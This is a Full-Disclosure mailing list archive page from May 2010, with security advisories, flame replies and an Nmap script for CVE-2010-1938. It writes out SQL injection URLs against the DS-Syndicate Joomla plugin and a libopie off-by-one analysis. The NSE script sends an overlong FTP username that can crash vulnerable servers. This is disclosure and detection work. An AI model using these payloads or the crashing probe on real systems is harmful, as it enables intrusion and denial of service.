Re: [Full-disclosure] To the police who torment, harass and stalk me.

[Michal]

On 27/05/2010 02:23, ☣frank^2 wrote:
 On Wed, May 26, 2010 at 7:15 AM,  n3pt...@london.com wrote:

 I am a question to the world,
 Not an answer to be heard.
 All a moment that's held in your arms.
 And what do you think you'd ever say?
 I won't listen anyway…
 You don't know me,
 And I’ll never be what you want me to be.
snip
 
 Pick up the pace!
 Enemy, show me what you wanna be.
 I can handle anything, even if I can't handle you.
 Readily, either way it better be.
 Don't you fucking pity me.
 Get up, get off.
 What the hell I'm saying i don't know about malevolent.
 Sure as hell decadent.
 I want someone to step up step off.
 Walls, let me fall, fuck you all.
 Get a grip, don't let me slip 'till i drop the ball.
 
snip

I'm a little teapot
Short and stout
Here is my handle
Here is my spout

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in DS-Syndicate for Joomla

[MustLive]

Hello Benji!

It's good that you are drawing attention to my advisories, but very often
your letters are unequal and not serious. So I've put you in my blacklist. I
already wrote recommendation for people to the list, to use your time
wisely. And because you can't do it by yourself (as it clear), I'll help
you. I hope now you'll become using your time more wisely.

 so you've moved from discovering leet xss vulnerabilities

I'm discovering any vulnerabilities which I meet during my researchers. I
have no prejudice for any of classes from WASC TC v1/v2. If you have some
problems with XSS or any other class of vulnerabilities, it's your own
problems (as I already mentioned to the list concerning moaning about XSS).

 to publishing old exploits?

I don't think it's old. While there are web sites with this vulnerability,
it'll be not old and actual. I found these vulnerabilities in 2009 at one
web site (and after my announce in 2010 I checked it on other web sites),
so that time were sites with these holes, and now there are sites with them.

And in my second advisory about DS-Syndicate, which I have published even
before you wrote me your letter, I wrote about new vulnerabilities which I
recently found in this plugin. So if you were looking for some fresh holes,
you could easily found them.

 I would offer you a sec. job, but unfortunately I think you're too
 qualified.

Thanks for offer :-). But I don't need offers from not serious people 
(including you).

Also note that from my side, I'd never offer you a security job, because I
need only serious employee. It's my main criterion for all kind of job,
including security job.

Best wishes  regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message - 
From: Benji
To: MustLive
Cc: full-disclosure@lists.grok.org.uk
Sent: Sunday, May 23, 2010 1:55 PM
Subject: Re: [Full-disclosure] Vulnerabilities in DS-Syndicate for Joomla


oh cool, so you've moved from discovering leet xss vulnerabilities to
publishing old exploits?

I would offer you a sec. job, but unfortunately I think you're too
qualified.


On Sat, May 22, 2010 at 4:09 PM, MustLive mustl...@websecurity.com.ua
wrote:

Hello Full-Disclosure!

I want to warn you about security vulnerabilities in plugin DS-Syndicate for
Joomla.

-
Advisory: Vulnerabilities in DS-Syndicate for Joomla
-
URL: http://websecurity.com.ua/4003/
-
Affected products: all versions of DS-Syndicate for Joomla.
-
Timeline:

16.08.2009 - found vulnerabilities.
04.03.2010 - announced at my site. And after making of announcement of these
vulnerabilities, I found that already in 2008 this SQLi vulnerability was
found by boom3rang (before I found it in 2009). Which disclosed exploit for
it at milw0rm.com (http://www.milw0rm.com/exploits/6792). So boom3rang first
found SQLi, and I first found Full path disclosure in this plugin.
09.03.2010 - informed developer (and at developer's site I found that he'd
no more support of this plugin, after his site on Joomla was hacked).
21.05.2010 - disclosed at my site.
-
Details:

These are SQL Injection and Full path disclosure vulnerabilities.

SQL Injection:

http://site/index2.php?option=ds-syndicateversion=1feed_id=-1%20or%20version()=5

Full path disclosure:

http://site/index2.php?option=ds-syndicateversion=1feed_id=

Note, that developer of the plugin don't support it anymore, so users of the
plugin need to fix it by themselves.

Just after disclosure of these vulnerabilities, I also found new
vulnerabilities in DS-Syndicate which I wrote about in separate advisory.

Best wishes  regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] libopie __readrec() off-by one (FreeBSD ftpd remote PoC)

[Adam Zabrocki]

[ libopie __readrec() off-by one (FreeBSD ftpd remote PoC) ]

Authors: 
- Maksymilian Arciemowicz
- Adam 'pi3' Zabrocki

http://securityreason.com/achievement_securityalert/87
http://site.pi3.com.pl/adv/libopie-adv.txt
http://blog.pi3.com.pl/?p=111


Date:
- Dis.: 04.05.2010
- Pub.: 27.05.2010

CVE: CVE-2010-1938
CWE: CWE-193

Affected Software:
- OPIE Authentication System ( libopie )

Software which use libopie:
- OpenSuSE
- wu-ftpd
- mod_opie
- PAM
- openssh (modified by FreeBSD/DragonflyBSD Team)
- sudo
- opiesu
- popper
- Probably much more...

PoC:
- FreeBSD 8.0 ftpd(8) Remote Off-by one
  line FreeBSD 7 is not affected
  
Other software can be also affected. 


NOTE: Prior versions may also be affected.

Orginal URL:
http://securityreason.com/achievement_securityalert/84


--- 0.Description ---
OPIE is a freely redistributable kit that will drop into most *IX systems and 
replaces
your login and FTP daemon with versions that use OTP for user authentication. 
It also
includes an OTP generator and a library to make it easy to add OTP 
authentication to
existing clients and servers.


--- 1. OPIE Authentication System Off-by one ---
Libopie allows REMOTE and LOCAL attackers to off-by-one attack (on the stack).
Let's look in the code:

/src/contrib/opie/opie.h
/* Maximum length of a principal (read: user name) */
#define OPIE_PRINCIPAL_MAX 32

./src/contrib/opie/libopie/readrec.c
int __opiereadrec FUNCTION((opie), struct opie *opie)
{
  ...
  ...
  {
char *c, principal[OPIE_PRINCIPAL_MAX];
int i;

if (c = strchr(opie-opie_principal, ':'))
  *c = 0;
[1] if (strlen(opie-opie_principal)  OPIE_PRINCIPAL_MAX)
[2]   (opie-opie_principal)[OPIE_PRINCIPAL_MAX] = 0;

[3] strcpy(principal, opie-opie_principal);
...
...
  }
  ...
  ...
ret:
  if (f)
fclose(f);
  return rval;
}


This function at [1] check the length of the variable 'opie-opie_principal'
which is full user controled. If this length is bigger than OPIE_PRINCIPAL_MAX
- 32 bytes, program will write at this position NULL byte. In fact the string
will be 32 bytes long.
Vulnerability exists at line [3]. Function strcpy() copy user controled variable
which can be maximum 32 bytes long, to the local bufor 'principal' which is 32
bytes long too. Here is off-by-one bug because function strcpy() after copied 32
bytes alwyas ADD NULL byte to the and of string. In fact it will be at the
position *(principal+32) which is out of buffer.
A possible way to exploit this vulnerability:

./src/contrib/opie/libopie/lookup.c
int opielookup FUNCTION((opie, principal), struct opie *opie AND char 
*principal)
{
  int i;

  memset(opie, 0, sizeof(struct opie));
  opie-opie_principal = principal;

  if (i = __opiereadrec(opie))  === our call ;)
return i;

  return (opie-opie_flags  __OPIE_FLAGS_RW) ? 0 : 2;
}


a deeper analyzis of the code shows:

./src/contrib/opie/libopie/challenge.c
int opiechallenge FUNCTION((mp, name, ss), struct opie *mp AND char *name AND 
char *ss)
{
  int rval = -1;

  rval = opielookup(mp, name);

  ...
  ...

  return rval;
}

This function is really intereting because it is responsible for authentication 
so this
vulnerability can be in the pre-auth phase. We can found many softwares which 
use this function
for authorization (for example default ftp daemon in FreeBSD) ;)

Another interesting call we can find here:

./src/contrib/opie/libopie/writerec.c
int __opiewriterec FUNCTION((opie), struct opie *opie)
{
  char buf[17], buf2[64];
  time_t now;
  FILE *f, *f2 = NULL;
  int i = 0;
  char *c;

  time(now);
  if (strftime(buf2, sizeof(buf2),  %b %d,%Y %T, localtime(now))  1)
return -1;

  if (!(opie-opie_flags  __OPIE_FLAGS_READ)) {
struct opie opie2;
i = opielookup(opie2, opie-opie_principal);  == our call :)
...
  }
  ...
  ...
}

and this function is used in many places:
./src/contrib/opie/libopie/passwd.c=== in function opiepasswd()
./src/contrib/opie/libopie/verify.c=== in function opieverify() - two 
times ;)

... so we have got many entry points ;) But we are going to test calls to 
function
opiechallenge(). Pre-auth vulnerability sounds impressive ;) At first let's 
test default
FTP daemon for FreeBSD 8.0 ...


--- 2. FreeBSD 8.0 ftpd remote off-by one ---
Authentication module for FTP server in FreeBSD 8 module was modified. By 
default it
uses OPIE library. Let`s see

http://www.freebsd.org/cgi/cvsweb.cgi/~checkout~/src/libexec/ftpd/ftpd.c?rev=1.214.2.1.2.1;content-type=text%2Fplain

...

if (opiechallenge(opiedata, name, opieprompt) == 0) {
pwok = (pw != NULL) 
   opieaccessfile(remotehost) 
   opiealways(pw-pw_dir);
reply(331, Response to %s %s for %s.,
  opieprompt, pwok ? requested : required, name);
} else {
pwok = 1;
reply(331, Password required for %s., name);
}
askpasswd = 1;
...


this code has 

[Full-disclosure] [ MDVSA-2010:109 ] gtk+2.0

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:109
 http://www.mandriva.com/security/
 ___

 Package : gtk+2.0
 Date: May 27, 2010
 Affected: 2008.0, 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability was discovered and fixed in gtk+2.0:
 
 gdk/gdkwindow.c in GTK+ before 2.18.5, as used in gnome-screensaver
 before 2.28.1, performs implicit paints on windows of type
 GDK_WINDOW_FOREIGN, which triggers an X error in certain circumstances
 and consequently allows physically proximate attackers to bypass
 screen locking and access an unattended workstation by pressing the
 Enter key many times (CVE-2010-0732).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149products_id=490
 
 This update fixes this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0732
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 c3a29224a7ab7f869fad3541908f6eff  
2008.0/i586/gtk+2.0-2.12.1-2.2mdv2008.0.i586.rpm
 f3b1608da1dce0eb474b1f21bd77d75b  
2008.0/i586/libgdk_pixbuf2.0_0-2.12.1-2.2mdv2008.0.i586.rpm
 040a1ca71f7eadb280de43c92e49c17d  
2008.0/i586/libgdk_pixbuf2.0_0-devel-2.12.1-2.2mdv2008.0.i586.rpm
 57e8f954302b4c65ade25df18a6c95df  
2008.0/i586/libgtk+2.0_0-2.12.1-2.2mdv2008.0.i586.rpm
 49419f6f92d6b0ec484aced9de1bab2e  
2008.0/i586/libgtk+2.0_0-devel-2.12.1-2.2mdv2008.0.i586.rpm
 00b2ead1a22168be0125f115d8f0acb1  
2008.0/i586/libgtk+-x11-2.0_0-2.12.1-2.2mdv2008.0.i586.rpm 
 e6ad155061eed97be73cd9cc8a52a0d9  
2008.0/SRPMS/gtk+2.0-2.12.1-2.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 311dd4f3603ff9759e1136eeecaee89b  
2008.0/x86_64/gtk+2.0-2.12.1-2.2mdv2008.0.x86_64.rpm
 1af93ae5f0a506d4bd96d488335b4aa4  
2008.0/x86_64/lib64gdk_pixbuf2.0_0-2.12.1-2.2mdv2008.0.x86_64.rpm
 90ad7d83058d56e88961cbb4a4087b74  
2008.0/x86_64/lib64gdk_pixbuf2.0_0-devel-2.12.1-2.2mdv2008.0.x86_64.rpm
 67e8e76883260fff690d6b04ebb89cfc  
2008.0/x86_64/lib64gtk+2.0_0-2.12.1-2.2mdv2008.0.x86_64.rpm
 129c65e8a1b8ba370556de12547c9f5c  
2008.0/x86_64/lib64gtk+2.0_0-devel-2.12.1-2.2mdv2008.0.x86_64.rpm
 57e9f7712ed1f9eda1a1729c29049f8d  
2008.0/x86_64/lib64gtk+-x11-2.0_0-2.12.1-2.2mdv2008.0.x86_64.rpm 
 e6ad155061eed97be73cd9cc8a52a0d9  
2008.0/SRPMS/gtk+2.0-2.12.1-2.2mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 bcd63973ddb957847088f71b5cfc039b  
2009.0/i586/gtk+2.0-2.14.3-2.1mdv2009.0.i586.rpm
 9b46f9018c8fbb2d1e052e0cdd473ff4  
2009.0/i586/libgail18-2.14.3-2.1mdv2009.0.i586.rpm
 4d243b829780c8d2f35b4a5f08ac9acb  
2009.0/i586/libgail-devel-2.14.3-2.1mdv2009.0.i586.rpm
 a8ca74ec343faac9f4445cfc88b5accc  
2009.0/i586/libgdk_pixbuf2.0_0-2.14.3-2.1mdv2009.0.i586.rpm
 583607af6457480c4cb71af16f6f4563  
2009.0/i586/libgdk_pixbuf2.0_0-devel-2.14.3-2.1mdv2009.0.i586.rpm
 8b9b0c013bc5815e5803b3be4e681433  
2009.0/i586/libgtk+2.0_0-2.14.3-2.1mdv2009.0.i586.rpm
 10f6558dc95fe770c87e99f711c089fb  
2009.0/i586/libgtk+2.0_0-devel-2.14.3-2.1mdv2009.0.i586.rpm
 23eb8c8cfc87a4209b125b8909fb8a9b  
2009.0/i586/libgtk+-x11-2.0_0-2.14.3-2.1mdv2009.0.i586.rpm 
 d301fc61a2c8dc41a436edb699061955  
2009.0/SRPMS/gtk+2.0-2.14.3-2.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 6999641e621f9ee15bc439e0fe9b981f  
2009.0/x86_64/gtk+2.0-2.14.3-2.1mdv2009.0.x86_64.rpm
 33851500c872f253715d11fc1f0b908d  
2009.0/x86_64/lib64gail18-2.14.3-2.1mdv2009.0.x86_64.rpm
 47eaee7ac4576291e0974d7117a89459  
2009.0/x86_64/lib64gail-devel-2.14.3-2.1mdv2009.0.x86_64.rpm
 e2b68a8d746c9bb2bd515c93220ed73d  
2009.0/x86_64/lib64gdk_pixbuf2.0_0-2.14.3-2.1mdv2009.0.x86_64.rpm
 62060cfea7c077bebf712ddeea8960f1  
2009.0/x86_64/lib64gdk_pixbuf2.0_0-devel-2.14.3-2.1mdv2009.0.x86_64.rpm
 c191760f279fc7ef06bef3e37d3a5f82  
2009.0/x86_64/lib64gtk+2.0_0-2.14.3-2.1mdv2009.0.x86_64.rpm
 8c3cbfa56ca337b7e76ede7cdb6bf2dd  
2009.0/x86_64/lib64gtk+2.0_0-devel-2.14.3-2.1mdv2009.0.x86_64.rpm
 650995e6bec10b2d424b708e1be21d2f  
2009.0/x86_64/lib64gtk+-x11-2.0_0-2.14.3-2.1mdv2009.0.x86_64.rpm 
 d301fc61a2c8dc41a436edb699061955  
2009.0/SRPMS/gtk+2.0-2.14.3-2.1mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 f2396f78726e185da0c3bef4d762e8d0  
2009.1/i586/gtk+2.0-2.16.1-4.1mdv2009.1.i586.rpm
 07d45a8c633b79b3769035bcb0612a4b  
2009.1/i586/libgail18-2.16.1-4.1mdv2009.1.i586.rpm
 9110a10744b8f30bbcf67cd8c03eb4c7  
2009.1/i586/libgail-devel-2.16.1-4.1mdv2009.1.i586.rpm
 6f6edd01aec6960ddef6da316deb0e67  
2009.1/i586/libgdk_pixbuf2.0_0-2.16.1-4.1mdv2009.1.i586.rpm
 1e74c1e51677679f4d1f717253bac8f8  

Re: [Full-disclosure] To the police who torment, harass and stalk me.

[sunjester]

They might be at your door. I recommend walking to your window and peeking
outside every 120 seconds.

-- 
Freelance Web/Desktop Developer
http://fusecurity.com/ | Free Security Technology
http://www.rentacoder.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDVSA-2010:110 ] clamav

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:110
 http://www.mandriva.com/security/
 ___

 Package : clamav
 Date: May 27, 2010
 Affected: 2008.0, 2009.0, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities was discovered and fixed in clamav:
 
 The cli_pdf function in libclamav/pdf.c in ClamAV before 0.96.1 allows
 remote attackers to cause a denial of service (crash) via a malformed
 PDF file, related to an inconsistency in the calculated stream length
 and the real stream length (CVE-2010-1639).
 
 Off-by-one error in the parseicon function in libclamav/pe_icons.c
 in ClamAV 0.96 allows remote attackers to cause a denial of service
 (crash) via a crafted PE icon that triggers an out-of-bounds read,
 related to improper rounding during scaling (CVE-2010-1640).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149products_id=490
 
 This update provides clamav 0.96.1 which is not vulnerable to these
 issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1639
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1640
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 befa2aace21d5723723bb3a93444fff6  
2008.0/i586/clamav-0.96.1-0.1mdv2008.0.i586.rpm
 91de0b1b1d3717b02c5ec78f40b60068  
2008.0/i586/clamav-db-0.96.1-0.1mdv2008.0.i586.rpm
 5e63fa6565cbfaa4cc4000f77524a181  
2008.0/i586/clamav-milter-0.96.1-0.1mdv2008.0.i586.rpm
 58e46d78bf423fbb1ef84d6073fe1040  
2008.0/i586/clamd-0.96.1-0.1mdv2008.0.i586.rpm
 f24eadf9d0a1b0a7c733568207743385  
2008.0/i586/libclamav6-0.96.1-0.1mdv2008.0.i586.rpm
 3fee97d038854d35d18aee05054b6c0d  
2008.0/i586/libclamav-devel-0.96.1-0.1mdv2008.0.i586.rpm 
 ffbe6ca177a8b262e4c6fc0ca0f3669c  
2008.0/SRPMS/clamav-0.96.1-0.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 1082117001d058707bdfacc642498a2a  
2008.0/x86_64/clamav-0.96.1-0.1mdv2008.0.x86_64.rpm
 21bd752b8b431e61c089ccf428d01d29  
2008.0/x86_64/clamav-db-0.96.1-0.1mdv2008.0.x86_64.rpm
 2f83a0bb14fcefb8717f80964b173894  
2008.0/x86_64/clamav-milter-0.96.1-0.1mdv2008.0.x86_64.rpm
 a873d1c7e52e1c3d66b0515f83cb  
2008.0/x86_64/clamd-0.96.1-0.1mdv2008.0.x86_64.rpm
 7646d23e108a6e14f8d4092415ac02b9  
2008.0/x86_64/lib64clamav6-0.96.1-0.1mdv2008.0.x86_64.rpm
 658acc18cafe0edfa371ecbc014df8ae  
2008.0/x86_64/lib64clamav-devel-0.96.1-0.1mdv2008.0.x86_64.rpm 
 ffbe6ca177a8b262e4c6fc0ca0f3669c  
2008.0/SRPMS/clamav-0.96.1-0.1mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 a8d05f37aa91c68aae2085ff732c702b  
2009.0/i586/clamav-0.96.1-0.1mdv2009.0.i586.rpm
 5ec9f018d0041edb436550c89309171d  
2009.0/i586/clamav-db-0.96.1-0.1mdv2009.0.i586.rpm
 99628e6c2a48857b8826602c697b16ab  
2009.0/i586/clamav-milter-0.96.1-0.1mdv2009.0.i586.rpm
 0224610ee1b6329eff5c22d7f39578f0  
2009.0/i586/clamd-0.96.1-0.1mdv2009.0.i586.rpm
 fca0b7af4f6bb22071c75baab07a35b1  
2009.0/i586/libclamav6-0.96.1-0.1mdv2009.0.i586.rpm
 bdabf8cdc50a4c5685e6d260afe415b3  
2009.0/i586/libclamav-devel-0.96.1-0.1mdv2009.0.i586.rpm 
 d11af730b3a2c053ba1d6ec23fc564f0  
2009.0/SRPMS/clamav-0.96.1-0.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 60f63c024a8f817dadffa0d89e21eb9f  
2009.0/x86_64/clamav-0.96.1-0.1mdv2009.0.x86_64.rpm
 18f79b9b586bc80732dd10dbd2a6cc79  
2009.0/x86_64/clamav-db-0.96.1-0.1mdv2009.0.x86_64.rpm
 a581fe3f1c8361fabaf3cb9f376d59cb  
2009.0/x86_64/clamav-milter-0.96.1-0.1mdv2009.0.x86_64.rpm
 86a0d9f2a488e4da2fe6b53527b815e7  
2009.0/x86_64/clamd-0.96.1-0.1mdv2009.0.x86_64.rpm
 7e9bad2cfe4809f985d9d908af327b8d  
2009.0/x86_64/lib64clamav6-0.96.1-0.1mdv2009.0.x86_64.rpm
 d805cfe2b75d9a0fa2ffa0d31d7d27ec  
2009.0/x86_64/lib64clamav-devel-0.96.1-0.1mdv2009.0.x86_64.rpm 
 d11af730b3a2c053ba1d6ec23fc564f0  
2009.0/SRPMS/clamav-0.96.1-0.1mdv2009.0.src.rpm

 Corporate 4.0:
 1f908bfa4cbe1232569026efcf034b12  
corporate/4.0/i586/clamav-0.96.1-0.1.20060mlcs4.i586.rpm
 647ff93c4169583e606987983de6f938  
corporate/4.0/i586/clamav-db-0.96.1-0.1.20060mlcs4.i586.rpm
 a1bd815b64388a6a04fd14f423970c70  
corporate/4.0/i586/clamav-milter-0.96.1-0.1.20060mlcs4.i586.rpm
 fe0f9d33df3d9127161a8551dbb7e6c7  
corporate/4.0/i586/clamd-0.96.1-0.1.20060mlcs4.i586.rpm
 2faa8d0b9553999d5b18314ce63bf06b  
corporate/4.0/i586/libclamav6-0.96.1-0.1.20060mlcs4.i586.rpm
 e4728f4fa514d353279521d8ae782c0a  
corporate/4.0/i586/libclamav-devel-0.96.1-0.1.20060mlcs4.i586.rpm 
 517ac78ca08fe3ccd80ccd0e160c4f02  
corporate/4.0/SRPMS/clamav-0.96.1-0.1.20060mlcs4.src.rpm

 Corporate 

[Full-disclosure] ftp-libopie.nse in response to CVE-2010-1938

[Henri Salo]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


A vulnerability that has been published today affects the OPIE
Authentication System (libopie).
According to the researchers it could hit many systems like

- - OpenSuSE
- - wu-ftpd
- - mod_opie
- - PAM
- - openssh (modified by FreeBSD/DragonflyBSD Team)
- - sudo
- - opiesu
- - popper
- - Probably much more...

Original advisory :
http://securityreason.com/achievement_securityalert/87 See also :
http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

Please find attached their PoC as a script for Nmap.
Example Output :
- -- PORT   STATE SERVICE
- -- 21/tcp open  ftp
- -- | ftp-libopie: Likely prone to CVE-2010-1938 (OPIE off-by-one stack
overflow)
- -- |_See
http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

A.G.


-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.12 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/

iEYEARECAAYFAkv+rS8ACgkQ3aDTTO0ha7j4igCffydmk9Y+U6ocVSNI5RwopoGh
vc0AniRSZZEkW5vgImS4czZsTTzS1bqf
=No6K
-END PGP SIGNATURE-

description = [[
Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow).
Vulnerability discovered by Maksymilian Arciemowicz and Adam 'pi3' Zabrocki

]]
   
---
-- @output
-- PORT   STATE SERVICE
-- 21/tcp open  ftp
-- | ftp-libopie: Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)
-- |_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

   
author = Ange Gutek
license = Same as Nmap--See http://nmap.org/book/man-legal.html;
categories = {intrusive}
   
require shortport
   
portrule = shortport.port_or_service(21, ftp)
   

action = function(host, port)
local socket = nmap.new_socket()
local result
-- If we use more that 31 chars for username, ftpd will crash (quoted from the 
advisory).
local user_account = AAA
local status = true

local err_catch = function()
socket:close()
end

local try = nmap.new_try(err_catch)

socket:set_timeout(1)
try(socket:connect(host.ip, port.number, port.protocol))

-- First, try a safe User so that we are sure that everything is ok
local payload = USER opie\r\n
try(socket:send(payload))

status, result = socket:receive_lines(1);
if status and not (string.match(result,^421)) then
  
  -- Second, try the vulnerable user account
  local payload = USER  .. user_account .. \r\n
  try(socket:send(payload))

  status, result = socket:receive_lines(1);
  if status then
return
  else
  -- if the server does not answer anymore we may have reached a stack 
overflow condition
  return Likely prone to CVE-2010-1938 (OPIE off-by-one stack 
overflow)\nSee http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc;
  end
else
return
end

socket:close()

end
___
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-945-1] ClamAV vulnerabilities

[Jamie Strandboge]

===
Ubuntu Security Notice USN-945-1   May 27, 2010
clamav vulnerabilities
CVE-2010-1639, CVE-2010-2077
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.04:
  libclamav6  0.95.3+dfsg-1ubuntu0.09.04.2

Ubuntu 9.10:
  libclamav6  0.95.3+dfsg-1ubuntu0.09.10.2

Ubuntu 10.04 LTS:
  libclamav6  0.96.1+dfsg-0ubuntu0.10.04.1

In general, a standard system update will make all the necessary
changes. For Ubuntu 10.04 LTS, this update uses a new upstream release,
which includes additional bug fixes.

Details follow:

It was discovered that ClamAV did not properly reallocate memory when
processing certain PDF files. A remote attacker could send a specially
crafted PDF and crash ClamAV. (CVE-2010-1639)

An out of bounds memory access flaw was discovered in ClamAV. A remote
attacker could send a specially crafted Portable Executable (PE) file
and crash ClamAV. This issue only affected Ubuntu 10.04 LTS.
(CVE-2010-2077)


Updated packages for Ubuntu 9.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.3+dfsg-1ubuntu0.09.04.2.diff.gz
  Size/MD5:   265661 7787b2b42609df529788c879e36d9fe8

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.3+dfsg-1ubuntu0.09.04.2.dsc
  Size/MD5: 1560 377a7d9c49cb15e1713f54b0a25778a2

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.3+dfsg.orig.tar.gz
  Size/MD5: 26892533 dfe1348c52223ab48f049123021aea4a

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-base_0.95.3+dfsg-1ubuntu0.09.04.2_all.deb
  Size/MD5: 24053336 60f643f76df7bf4db43f644bfc3ed5b4

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-docs_0.95.3+dfsg-1ubuntu0.09.04.2_all.deb
  Size/MD5:  1123516 f71ab8f9fba78f294ced9c926d0e7b04

http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-testfiles_0.95.3+dfsg-1ubuntu0.09.04.2_all.deb
  Size/MD5:   232182 9800f0104337931ae21666820cde

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb
  Size/MD5:   382010 a9505fb7d8d8f5f0356ca6e78cc7e04a

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb
  Size/MD5:  1167968 1fa1d2e81f9087949fc3b9a03aa8d6ee

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb
  Size/MD5:   287956 9ffd2f325bc3502f78b35a9b8f193e3a

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb
  Size/MD5:   280340 caf37e1970961ec2da36f58172d88049

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb
  Size/MD5:   614446 4ddcb4980913c6e46d5a9eb0b5bcc290

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav6_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb
  Size/MD5:   579218 e7431e82192047d8c826a5b5181f58c4

http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb
  Size/MD5:   308570 69d6fba8d6eb6b0565df12334c5b1e4d

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb
  Size/MD5:   369822 0bc1791b8fe80b663624303440caee1e

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb
  Size/MD5:  1082008 dddcf1b0edea5259597406d989699290

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb
  Size/MD5:   285352 a40c187d2495a44fcebf2d6d777d4967

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb
  Size/MD5:   275122 c11a165ab966c63b8d3fe643b65ad607

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb
  Size/MD5:   582384 586b5b1ad20b2b6373addfe17785b5ba

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav6_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb
  Size/MD5:   566848 455db6e033a4ecf8f98febcee221aa55

http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb
  Size/MD5:   304884 1cffeedb1dd62e82bef4939c9d6d84ab

  lpia architecture (Low Power Intel Architecture):

[Full-disclosure] VMSA-2010-0009 ESXi ntp and ESX Service Console third party updates

[VMware Security team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
   VMware Security Advisory

Advisory ID:   VMSA-2010-0009
Synopsis:  ESXi ntp and ESX Service Console third party updates
Issue date:2010-05-27
Updated on:2010-05-27 (initial release of advisory)
